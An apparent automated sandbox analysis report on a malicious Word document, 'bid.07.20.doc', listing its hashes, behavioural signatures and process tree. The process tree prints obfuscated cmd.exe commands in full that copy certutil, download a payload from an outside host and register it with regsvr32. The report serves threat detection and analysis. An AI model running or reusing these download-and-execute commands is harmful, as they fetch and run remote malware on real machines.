Analysis
-
max time kernel
145s -
max time network
130s -
platform
windows10_x64 -
resource
win10 -
submitted
03-08-2020 20:04
Static task
static1
Behavioral task
behavioral1
Sample
bid.07.20.doc
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
bid.07.20.doc
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
bid.07.20.doc
-
Size
110KB
-
MD5
df1c3c76ae77a9c9e14e642e211e1cdf
-
SHA1
012dcfc2876916eaf12c1356e5fe893c7d155c70
-
SHA256
a01810ab151d6b800e1b6d9c692485fe5c6462d7c6900b197cebd19a3c7a154f
-
SHA512
7bf330e64225a6294b3085fdc435478c5405f2c4379ceca4e285e319288091a7cd72ea688ff944414cbc62ef28240a9a05b4bb202fce1fe9959e7de1898ab1dd
Score
10/10
Malware Config
Signatures
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3704 WINWORD.EXE 3704 WINWORD.EXE -
Executes dropped EXE 1 IoCs
pid Process 3612 1.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3704 wrote to memory of 2164 3704 WINWORD.EXE 71 PID 3704 wrote to memory of 2164 3704 WINWORD.EXE 71 PID 3704 wrote to memory of 3596 3704 WINWORD.EXE 73 PID 3704 wrote to memory of 3596 3704 WINWORD.EXE 73 PID 3596 wrote to memory of 3612 3596 cmd.exe 75 PID 3596 wrote to memory of 3612 3596 cmd.exe 75 -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 3596 cmd.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Drops file in Program Files directory 18 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\Casual.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$ntered.dotx WINWORD.EXE File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\BasicSimple.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$sicSimple.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$sicStylish.dotx WINWORD.EXE File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\BWClassic.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$sicElegant.dotx WINWORD.EXE File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\BasicStylish.dotx WINWORD.EXE File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\BWCapitalized.dotx WINWORD.EXE File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\Word2013BW.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$rd2013BW.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$Casual.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$Classic.dotx WINWORD.EXE File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\BWNumbered.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$Numbered.dotx WINWORD.EXE File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\BasicElegant.dotx WINWORD.EXE File created C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\~$Capitalized.dotx WINWORD.EXE File opened for modification C:\Program Files\Microsoft Office\Root\Office16\1033\QuickStyles\Centered.dotx WINWORD.EXE -
Suspicious use of SetWindowsHookEx 21 IoCs
pid Process 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE 3704 WINWORD.EXE -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2164 3704 cmd.exe 66 Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3596 3704 cmd.exe 66
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bid.07.20.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Enumerates system info in registry
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3704 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe2⤵
- Process spawned unexpected child process
PID:2164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://vkr0bt.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"2⤵
- Suspicious use of WriteProcessMemory
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Process spawned unexpected child process
PID:3596 -
C:\ProgramData\1.exeC:\ProgramData\1.exe /urlcache /f http://vkr0bt.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp3⤵
- Executes dropped EXE
PID:3612
-
-